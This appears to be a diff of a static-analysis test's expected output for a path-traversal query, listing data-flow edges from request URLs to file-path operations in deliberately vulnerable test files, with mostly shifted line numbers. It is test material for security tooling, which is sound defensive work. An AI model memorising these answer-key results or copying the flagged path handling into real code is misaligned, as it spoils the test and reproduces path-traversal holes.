typescript.ts:29:7:29:18 | path6 | semmle.label | path6 | +| typescript.ts:29:15:29:18 | path | semmle.label | path | +| typescript.ts:31:29:31:33 | path6 | semmle.label | path6 | | views.js:1:43:1:55 | req.params[0] | semmle.label | req.params[0] | edges -| TaintedPath-es6.js:7:7:7:44 | path | TaintedPath-es6.js:10:41:10:44 | path | provenance | | +| TaintedPath-es6.js:7:7:7:44 | path | TaintedPath-es6.js:9:41:9:44 | path | provenance | | | TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | provenance | Config | | TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | TaintedPath-es6.js:7:14:7:44 | parse(r ... 
ry.path | provenance | Config | | TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | TaintedPath-es6.js:7:7:7:44 | path | provenance | | | TaintedPath-es6.js:7:20:7:26 | req.url | TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | provenance | Config | -| TaintedPath-es6.js:10:41:10:44 | path | TaintedPath-es6.js:10:26:10:45 | join("public", path) | provenance | Config | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:12:29:12:32 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:15:45:15:48 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:18:33:18:36 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:21:33:21:36 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:24:33:24:36 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:33:31:33:34 | path | provenance | | +| TaintedPath-es6.js:9:41:9:44 | path | TaintedPath-es6.js:9:26:9:45 | join("public", path) | provenance | Config | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:11:29:11:32 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:13:45:13:48 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:16:33:16:36 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:19:33:19:36 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:22:33:22:36 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:31:31:31:34 | path | provenance | | | TaintedPath.js:9:14:9:37 | url.par ... , true) | TaintedPath.js:9:14:9:43 | url.par ... ).query | provenance | Config | | TaintedPath.js:9:14:9:43 | url.par ... ).query | TaintedPath.js:9:14:9:48 | url.par ... ry.path | provenance | Config | | TaintedPath.js:9:14:9:48 | url.par ... ry.path | TaintedPath.js:9:7:9:48 | path | provenance | | | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:9:14:9:37 | url.par ... 
, true) | provenance | Config | -| TaintedPath.js:15:45:15:48 | path | TaintedPath.js:15:29:15:48 | "/home/user/" + path | provenance | Config | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:42:48:42:51 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:46:45:46:48 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:48:51:48:54 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:50:50:50:53 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:52:52:52:55 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:54:49:54:52 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:56:48:56:51 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:58:54:58:57 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:60:57:60:60 | path | provenance | | -| TaintedPath.js:38:10:38:33 | url.par ... , true) | TaintedPath.js:38:10:38:39 | url.par ... ).query | provenance | Config | -| TaintedPath.js:38:10:38:39 | url.par ... ).query | TaintedPath.js:38:10:38:44 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:38:10:38:44 | url.par ... ry.path | TaintedPath.js:38:3:38:44 | path | provenance | | -| TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:38:10:38:33 | url.par ... , true) | provenance | Config | -| TaintedPath.js:42:48:42:51 | path | TaintedPath.js:42:29:42:52 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:46:45:46:48 | path | TaintedPath.js:46:29:46:49 | pathMod ... n(path) | provenance | Config | -| TaintedPath.js:48:51:48:54 | path | TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | provenance | Config | -| TaintedPath.js:50:50:50:53 | path | TaintedPath.js:50:29:50:54 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:52:52:52:55 | path | TaintedPath.js:52:29:52:56 | pathMod ... 
, path) | provenance | Config | -| TaintedPath.js:54:49:54:52 | path | TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | provenance | Config | -| TaintedPath.js:56:48:56:51 | path | TaintedPath.js:56:29:56:52 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:58:54:58:57 | path | TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | provenance | Config | -| TaintedPath.js:60:57:60:60 | path | TaintedPath.js:60:29:60:61 | pathMod ... h(path) | provenance | Config | -| TaintedPath.js:65:31:65:70 | require ... eq.url) | TaintedPath.js:65:31:65:76 | require ... ).query | provenance | Config | -| TaintedPath.js:65:63:65:69 | req.url | TaintedPath.js:65:31:65:70 | require ... eq.url) | provenance | Config | -| TaintedPath.js:66:31:66:68 | require ... eq.url) | TaintedPath.js:66:31:66:74 | require ... ).query | provenance | Config | -| TaintedPath.js:66:61:66:67 | req.url | TaintedPath.js:66:31:66:68 | require ... eq.url) | provenance | Config | -| TaintedPath.js:67:31:67:67 | require ... eq.url) | TaintedPath.js:67:31:67:73 | require ... ).query | provenance | Config | -| TaintedPath.js:67:60:67:66 | req.url | TaintedPath.js:67:31:67:67 | require ... eq.url) | provenance | Config | -| TaintedPath.js:84:6:84:47 | path | TaintedPath.js:86:44:86:47 | path | provenance | | -| TaintedPath.js:84:6:84:47 | path | TaintedPath.js:87:14:87:17 | path | provenance | | -| TaintedPath.js:84:13:84:36 | url.par ... , true) | TaintedPath.js:84:13:84:42 | url.par ... ).query | provenance | Config | -| TaintedPath.js:84:13:84:42 | url.par ... ).query | TaintedPath.js:84:13:84:47 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:84:13:84:47 | url.par ... ry.path | TaintedPath.js:84:6:84:47 | path | provenance | | -| TaintedPath.js:84:23:84:29 | req.url | TaintedPath.js:84:13:84:36 | url.par ... , true) | provenance | Config | -| TaintedPath.js:86:44:86:47 | path | TaintedPath.js:86:28:86:48 | fs.real ... 
c(path) | provenance | Config | -| TaintedPath.js:87:14:87:17 | path | TaintedPath.js:88:32:88:39 | realpath | provenance | Config | -| TaintedPath.js:88:32:88:39 | realpath | TaintedPath.js:89:45:89:52 | realpath | provenance | | -| TaintedPath.js:120:6:120:47 | path | TaintedPath.js:122:23:122:26 | path | provenance | | -| TaintedPath.js:120:13:120:36 | url.par ... , true) | TaintedPath.js:120:13:120:42 | url.par ... ).query | provenance | Config | -| TaintedPath.js:120:13:120:42 | url.par ... ).query | TaintedPath.js:120:13:120:47 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:120:13:120:47 | url.par ... ry.path | TaintedPath.js:120:6:120:47 | path | provenance | | -| TaintedPath.js:120:23:120:29 | req.url | TaintedPath.js:120:13:120:36 | url.par ... , true) | provenance | Config | -| TaintedPath.js:126:7:126:48 | path | TaintedPath.js:128:19:128:22 | path | provenance | | -| TaintedPath.js:126:7:126:48 | path | TaintedPath.js:130:15:130:18 | path | provenance | | -| TaintedPath.js:126:14:126:37 | url.par ... , true) | TaintedPath.js:126:14:126:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:126:14:126:43 | url.par ... ).query | TaintedPath.js:126:14:126:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:126:14:126:48 | url.par ... ry.path | TaintedPath.js:126:7:126:48 | path | provenance | | -| TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:126:14:126:37 | url.par ... 
, true) | provenance | Config | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:132:19:132:23 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:136:19:136:23 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:137:28:137:32 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:139:33:139:37 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:142:20:142:24 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:145:19:145:23 | split | provenance | | -| TaintedPath.js:130:15:130:18 | path | TaintedPath.js:130:15:130:29 | path.split("/") | provenance | Config | -| TaintedPath.js:130:15:130:29 | path.split("/") | TaintedPath.js:130:7:130:29 | split | provenance | | -| TaintedPath.js:132:19:132:23 | split | TaintedPath.js:132:19:132:33 | split.join("/") | provenance | Config | -| TaintedPath.js:136:19:136:23 | split | TaintedPath.js:136:19:136:26 | split[x] | provenance | Config | -| TaintedPath.js:137:28:137:32 | split | TaintedPath.js:137:28:137:35 | split[x] | provenance | Config | -| TaintedPath.js:137:28:137:35 | split[x] | TaintedPath.js:137:19:137:35 | prefix + split[x] | provenance | Config | -| TaintedPath.js:139:7:139:38 | concatted | TaintedPath.js:140:19:140:27 | concatted | provenance | | -| TaintedPath.js:139:19:139:38 | prefix.concat(split) | TaintedPath.js:139:7:139:38 | concatted | provenance | | -| TaintedPath.js:139:33:139:37 | split | TaintedPath.js:139:19:139:38 | prefix.concat(split) | provenance | Config | -| TaintedPath.js:140:19:140:27 | concatted | TaintedPath.js:140:19:140:37 | concatted.join("/") | provenance | Config | -| TaintedPath.js:142:7:142:39 | concatted2 | TaintedPath.js:143:19:143:28 | concatted2 | provenance | | -| TaintedPath.js:142:20:142:24 | split | TaintedPath.js:142:20:142:39 | split.concat(prefix) | provenance | Config | -| TaintedPath.js:142:20:142:39 | split.concat(prefix) | 
TaintedPath.js:142:7:142:39 | concatted2 | provenance | | -| TaintedPath.js:143:19:143:28 | concatted2 | TaintedPath.js:143:19:143:38 | concatted2.join("/") | provenance | Config | -| TaintedPath.js:145:19:145:23 | split | TaintedPath.js:145:19:145:29 | split.pop() | provenance | Config | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:154:29:154:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:160:29:160:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:161:29:161:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:162:29:162:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:163:29:163:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:178:40:178:43 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:179:50:179:53 | path | provenance | | -| TaintedPath.js:150:14:150:37 | url.par ... , true) | TaintedPath.js:150:14:150:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:150:14:150:43 | url.par ... ).query | TaintedPath.js:150:14:150:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:150:14:150:48 | url.par ... ry.path | TaintedPath.js:150:7:150:48 | path | provenance | | -| TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:150:14:150:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:154:29:154:32 | path | TaintedPath.js:154:29:154:55 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:160:29:160:32 | path | TaintedPath.js:160:29:160:52 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:161:29:161:32 | path | TaintedPath.js:161:29:161:53 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:162:29:162:32 | path | TaintedPath.js:162:29:162:51 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:163:29:163:32 | path | TaintedPath.js:163:29:163:57 | path.re ... 
/g, '') | provenance | Config | -| TaintedPath.js:178:40:178:43 | path | TaintedPath.js:178:40:178:73 | path.re ... +/, '') | provenance | Config | -| TaintedPath.js:178:40:178:73 | path.re ... +/, '') | TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | provenance | Config | -| TaintedPath.js:179:29:179:54 | pathMod ... e(path) | TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | provenance | Config | -| TaintedPath.js:179:50:179:53 | path | TaintedPath.js:179:29:179:54 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:187:29:187:45 | qs.parse(req.url) | TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | provenance | Config | -| TaintedPath.js:187:38:187:44 | req.url | TaintedPath.js:187:29:187:45 | qs.parse(req.url) | provenance | Config | -| TaintedPath.js:188:29:188:59 | qs.pars ... q.url)) | TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | provenance | Config | -| TaintedPath.js:188:38:188:58 | normali ... eq.url) | TaintedPath.js:188:29:188:59 | qs.pars ... q.url)) | provenance | Config | -| TaintedPath.js:188:51:188:57 | req.url | TaintedPath.js:188:38:188:58 | normali ... eq.url) | provenance | Config | -| TaintedPath.js:190:29:190:51 | parseqs ... eq.url) | TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | provenance | Config | -| TaintedPath.js:190:44:190:50 | req.url | TaintedPath.js:190:29:190:51 | parseqs ... eq.url) | provenance | Config | -| TaintedPath.js:195:7:195:48 | path | TaintedPath.js:196:31:196:34 | path | provenance | | -| TaintedPath.js:195:7:195:48 | path | TaintedPath.js:197:45:197:48 | path | provenance | | -| TaintedPath.js:195:7:195:48 | path | TaintedPath.js:198:35:198:38 | path | provenance | | -| TaintedPath.js:195:14:195:37 | url.par ... , true) | TaintedPath.js:195:14:195:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:195:14:195:43 | url.par ... ).query | TaintedPath.js:195:14:195:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:195:14:195:48 | url.par ... 
ry.path | TaintedPath.js:195:7:195:48 | path | provenance | | -| TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:195:14:195:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:202:7:202:48 | path | TaintedPath.js:206:29:206:32 | path | provenance | | -| TaintedPath.js:202:14:202:37 | url.par ... , true) | TaintedPath.js:202:14:202:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:202:14:202:43 | url.par ... ).query | TaintedPath.js:202:14:202:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:202:14:202:48 | url.par ... ry.path | TaintedPath.js:202:7:202:48 | path | provenance | | -| TaintedPath.js:202:24:202:30 | req.url | TaintedPath.js:202:14:202:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:206:29:206:32 | path | TaintedPath.js:206:29:206:85 | path.re ... '), '') | provenance | Config | -| TaintedPath.js:211:7:211:48 | path | TaintedPath.js:213:29:213:32 | path | provenance | | -| TaintedPath.js:211:7:211:48 | path | TaintedPath.js:216:31:216:34 | path | provenance | | -| TaintedPath.js:211:14:211:37 | url.par ... , true) | TaintedPath.js:211:14:211:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:211:14:211:43 | url.par ... ).query | TaintedPath.js:211:14:211:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:211:14:211:48 | url.par ... ry.path | TaintedPath.js:211:7:211:48 | path | provenance | | -| TaintedPath.js:211:24:211:30 | req.url | TaintedPath.js:211:14:211:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:213:29:213:32 | path | TaintedPath.js:213:29:213:68 | path.re ... '), '') | provenance | Config | -| TaintedPath.js:216:31:216:34 | path | TaintedPath.js:216:31:216:69 | path.re ... 
'), '') | provenance | Config | -| examples/TaintedPath.js:8:7:8:52 | filePath | examples/TaintedPath.js:11:36:11:43 | filePath | provenance | | +| TaintedPath.js:13:45:13:48 | path | TaintedPath.js:13:29:13:48 | "/home/user/" + path | provenance | Config | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:39:48:39:51 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:42:45:42:48 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:43:51:43:54 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:44:50:44:53 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:45:52:45:55 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:46:49:46:52 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:47:48:47:51 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:48:54:48:57 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:49:57:49:60 | path | provenance | | +| TaintedPath.js:36:10:36:33 | url.par ... , true) | TaintedPath.js:36:10:36:39 | url.par ... ).query | provenance | Config | +| TaintedPath.js:36:10:36:39 | url.par ... ).query | TaintedPath.js:36:10:36:44 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:36:10:36:44 | url.par ... ry.path | TaintedPath.js:36:3:36:44 | path | provenance | | +| TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:36:10:36:33 | url.par ... , true) | provenance | Config | +| TaintedPath.js:39:48:39:51 | path | TaintedPath.js:39:29:39:52 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:42:45:42:48 | path | TaintedPath.js:42:29:42:49 | pathMod ... n(path) | provenance | Config | +| TaintedPath.js:43:51:43:54 | path | TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | provenance | Config | +| TaintedPath.js:44:50:44:53 | path | TaintedPath.js:44:29:44:54 | pathMod ... 
e(path) | provenance | Config | +| TaintedPath.js:45:52:45:55 | path | TaintedPath.js:45:29:45:56 | pathMod ... , path) | provenance | Config | +| TaintedPath.js:46:49:46:52 | path | TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | provenance | Config | +| TaintedPath.js:47:48:47:51 | path | TaintedPath.js:47:29:47:52 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:48:54:48:57 | path | TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | provenance | Config | +| TaintedPath.js:49:57:49:60 | path | TaintedPath.js:49:29:49:61 | pathMod ... h(path) | provenance | Config | +| TaintedPath.js:54:31:54:70 | require ... eq.url) | TaintedPath.js:54:31:54:76 | require ... ).query | provenance | Config | +| TaintedPath.js:54:63:54:69 | req.url | TaintedPath.js:54:31:54:70 | require ... eq.url) | provenance | Config | +| TaintedPath.js:55:31:55:68 | require ... eq.url) | TaintedPath.js:55:31:55:74 | require ... ).query | provenance | Config | +| TaintedPath.js:55:61:55:67 | req.url | TaintedPath.js:55:31:55:68 | require ... eq.url) | provenance | Config | +| TaintedPath.js:56:31:56:67 | require ... eq.url) | TaintedPath.js:56:31:56:73 | require ... ).query | provenance | Config | +| TaintedPath.js:56:60:56:66 | req.url | TaintedPath.js:56:31:56:67 | require ... eq.url) | provenance | Config | +| TaintedPath.js:73:6:73:47 | path | TaintedPath.js:75:44:75:47 | path | provenance | | +| TaintedPath.js:73:6:73:47 | path | TaintedPath.js:76:14:76:17 | path | provenance | | +| TaintedPath.js:73:13:73:36 | url.par ... , true) | TaintedPath.js:73:13:73:42 | url.par ... ).query | provenance | Config | +| TaintedPath.js:73:13:73:42 | url.par ... ).query | TaintedPath.js:73:13:73:47 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:73:13:73:47 | url.par ... ry.path | TaintedPath.js:73:6:73:47 | path | provenance | | +| TaintedPath.js:73:23:73:29 | req.url | TaintedPath.js:73:13:73:36 | url.par ... 
, true) | provenance | Config | +| TaintedPath.js:75:44:75:47 | path | TaintedPath.js:75:28:75:48 | fs.real ... c(path) | provenance | Config | +| TaintedPath.js:76:14:76:17 | path | TaintedPath.js:77:32:77:39 | realpath | provenance | Config | +| TaintedPath.js:77:32:77:39 | realpath | TaintedPath.js:78:45:78:52 | realpath | provenance | | +| TaintedPath.js:109:6:109:47 | path | TaintedPath.js:111:23:111:26 | path | provenance | | +| TaintedPath.js:109:13:109:36 | url.par ... , true) | TaintedPath.js:109:13:109:42 | url.par ... ).query | provenance | Config | +| TaintedPath.js:109:13:109:42 | url.par ... ).query | TaintedPath.js:109:13:109:47 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:109:13:109:47 | url.par ... ry.path | TaintedPath.js:109:6:109:47 | path | provenance | | +| TaintedPath.js:109:23:109:29 | req.url | TaintedPath.js:109:13:109:36 | url.par ... , true) | provenance | Config | +| TaintedPath.js:115:7:115:48 | path | TaintedPath.js:117:19:117:22 | path | provenance | | +| TaintedPath.js:115:7:115:48 | path | TaintedPath.js:119:15:119:18 | path | provenance | | +| TaintedPath.js:115:14:115:37 | url.par ... , true) | TaintedPath.js:115:14:115:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:115:14:115:43 | url.par ... ).query | TaintedPath.js:115:14:115:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:115:14:115:48 | url.par ... ry.path | TaintedPath.js:115:7:115:48 | path | provenance | | +| TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:115:14:115:37 | url.par ... 
, true) | provenance | Config | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:121:19:121:23 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:125:19:125:23 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:126:28:126:32 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:128:33:128:37 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:131:20:131:24 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:134:19:134:23 | split | provenance | | +| TaintedPath.js:119:15:119:18 | path | TaintedPath.js:119:15:119:29 | path.split("/") | provenance | Config | +| TaintedPath.js:119:15:119:29 | path.split("/") | TaintedPath.js:119:7:119:29 | split | provenance | | +| TaintedPath.js:121:19:121:23 | split | TaintedPath.js:121:19:121:33 | split.join("/") | provenance | Config | +| TaintedPath.js:125:19:125:23 | split | TaintedPath.js:125:19:125:26 | split[x] | provenance | Config | +| TaintedPath.js:126:28:126:32 | split | TaintedPath.js:126:28:126:35 | split[x] | provenance | Config | +| TaintedPath.js:126:28:126:35 | split[x] | TaintedPath.js:126:19:126:35 | prefix + split[x] | provenance | Config | +| TaintedPath.js:128:7:128:38 | concatted | TaintedPath.js:129:19:129:27 | concatted | provenance | | +| TaintedPath.js:128:19:128:38 | prefix.concat(split) | TaintedPath.js:128:7:128:38 | concatted | provenance | | +| TaintedPath.js:128:33:128:37 | split | TaintedPath.js:128:19:128:38 | prefix.concat(split) | provenance | Config | +| TaintedPath.js:129:19:129:27 | concatted | TaintedPath.js:129:19:129:37 | concatted.join("/") | provenance | Config | +| TaintedPath.js:131:7:131:39 | concatted2 | TaintedPath.js:132:19:132:28 | concatted2 | provenance | | +| TaintedPath.js:131:20:131:24 | split | TaintedPath.js:131:20:131:39 | split.concat(prefix) | provenance | Config | +| TaintedPath.js:131:20:131:39 | split.concat(prefix) | 
TaintedPath.js:131:7:131:39 | concatted2 | provenance | | +| TaintedPath.js:132:19:132:28 | concatted2 | TaintedPath.js:132:19:132:38 | concatted2.join("/") | provenance | Config | +| TaintedPath.js:134:19:134:23 | split | TaintedPath.js:134:19:134:29 | split.pop() | provenance | Config | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:143:29:143:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:149:29:149:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:150:29:150:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:151:29:151:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:152:29:152:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:167:40:167:43 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:168:50:168:53 | path | provenance | | +| TaintedPath.js:139:14:139:37 | url.par ... , true) | TaintedPath.js:139:14:139:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:139:14:139:43 | url.par ... ).query | TaintedPath.js:139:14:139:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:139:14:139:48 | url.par ... ry.path | TaintedPath.js:139:7:139:48 | path | provenance | | +| TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:139:14:139:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:143:29:143:32 | path | TaintedPath.js:143:29:143:55 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:149:29:149:32 | path | TaintedPath.js:149:29:149:52 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:150:29:150:32 | path | TaintedPath.js:150:29:150:53 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:151:29:151:32 | path | TaintedPath.js:151:29:151:51 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:152:29:152:32 | path | TaintedPath.js:152:29:152:57 | path.re ... 
/g, '') | provenance | Config | +| TaintedPath.js:167:40:167:43 | path | TaintedPath.js:167:40:167:73 | path.re ... +/, '') | provenance | Config | +| TaintedPath.js:167:40:167:73 | path.re ... +/, '') | TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | provenance | Config | +| TaintedPath.js:168:29:168:54 | pathMod ... e(path) | TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | provenance | Config | +| TaintedPath.js:168:50:168:53 | path | TaintedPath.js:168:29:168:54 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:176:29:176:45 | qs.parse(req.url) | TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | provenance | Config | +| TaintedPath.js:176:38:176:44 | req.url | TaintedPath.js:176:29:176:45 | qs.parse(req.url) | provenance | Config | +| TaintedPath.js:177:29:177:59 | qs.pars ... q.url)) | TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | provenance | Config | +| TaintedPath.js:177:38:177:58 | normali ... eq.url) | TaintedPath.js:177:29:177:59 | qs.pars ... q.url)) | provenance | Config | +| TaintedPath.js:177:51:177:57 | req.url | TaintedPath.js:177:38:177:58 | normali ... eq.url) | provenance | Config | +| TaintedPath.js:179:29:179:51 | parseqs ... eq.url) | TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | provenance | Config | +| TaintedPath.js:179:44:179:50 | req.url | TaintedPath.js:179:29:179:51 | parseqs ... eq.url) | provenance | Config | +| TaintedPath.js:184:7:184:48 | path | TaintedPath.js:185:31:185:34 | path | provenance | | +| TaintedPath.js:184:7:184:48 | path | TaintedPath.js:186:45:186:48 | path | provenance | | +| TaintedPath.js:184:7:184:48 | path | TaintedPath.js:187:35:187:38 | path | provenance | | +| TaintedPath.js:184:14:184:37 | url.par ... , true) | TaintedPath.js:184:14:184:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:184:14:184:43 | url.par ... ).query | TaintedPath.js:184:14:184:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:184:14:184:48 | url.par ... 
ry.path | TaintedPath.js:184:7:184:48 | path | provenance | | +| TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:184:14:184:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:191:7:191:48 | path | TaintedPath.js:195:29:195:32 | path | provenance | | +| TaintedPath.js:191:14:191:37 | url.par ... , true) | TaintedPath.js:191:14:191:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:191:14:191:43 | url.par ... ).query | TaintedPath.js:191:14:191:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:191:14:191:48 | url.par ... ry.path | TaintedPath.js:191:7:191:48 | path | provenance | | +| TaintedPath.js:191:24:191:30 | req.url | TaintedPath.js:191:14:191:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:195:29:195:32 | path | TaintedPath.js:195:29:195:85 | path.re ... '), '') | provenance | Config | +| TaintedPath.js:200:7:200:48 | path | TaintedPath.js:202:29:202:32 | path | provenance | | +| TaintedPath.js:200:7:200:48 | path | TaintedPath.js:205:31:205:34 | path | provenance | | +| TaintedPath.js:200:14:200:37 | url.par ... , true) | TaintedPath.js:200:14:200:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:200:14:200:43 | url.par ... ).query | TaintedPath.js:200:14:200:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:200:14:200:48 | url.par ... ry.path | TaintedPath.js:200:7:200:48 | path | provenance | | +| TaintedPath.js:200:24:200:30 | req.url | TaintedPath.js:200:14:200:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:202:29:202:32 | path | TaintedPath.js:202:29:202:68 | path.re ... '), '') | provenance | Config | +| TaintedPath.js:205:31:205:34 | path | TaintedPath.js:205:31:205:69 | path.re ... '), '') | provenance | Config | +| examples/TaintedPath.js:8:7:8:52 | filePath | examples/TaintedPath.js:10:36:10:43 | filePath | provenance | | | examples/TaintedPath.js:8:18:8:41 | url.par ... 
